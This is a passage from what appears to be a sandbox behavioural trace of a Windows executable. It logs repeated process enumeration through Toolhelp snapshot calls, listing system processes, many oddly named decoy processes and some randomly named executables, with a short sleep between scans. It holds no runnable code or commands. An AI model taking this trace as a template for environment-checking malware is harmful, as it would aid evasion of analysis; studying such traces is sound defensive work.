lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.931] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.933] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0108.934] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0108.935] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0108.937] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0108.938] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0108.939] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0108.940] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0108.941] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0108.942] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0108.943] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0108.949] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0108.950] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0108.951] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0108.952] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0108.953] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0108.954] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0108.955] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0108.956] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0108.957] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0108.958] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0108.959] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0108.961] CloseHandle (hObject=0xc4) returned 1 [0108.961] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0108.966] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.966] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0108.967] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.970] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0108.972] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.973] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.973] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0108.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0108.982] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.983] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.984] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.985] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.986] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0108.988] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0108.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0108.990] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0109.008] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.009] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0109.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.016] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0109.020] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0109.021] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0109.023] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0109.026] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0109.027] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0109.028] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0109.029] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0109.031] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0109.032] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.033] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.034] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0109.036] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0109.037] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0109.038] CloseHandle (hObject=0xbc) returned 1 [0109.038] Sleep (dwMilliseconds=0x12c) [0109.354] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0109.360] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.360] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.361] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.362] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.363] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.364] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.365] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.366] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, 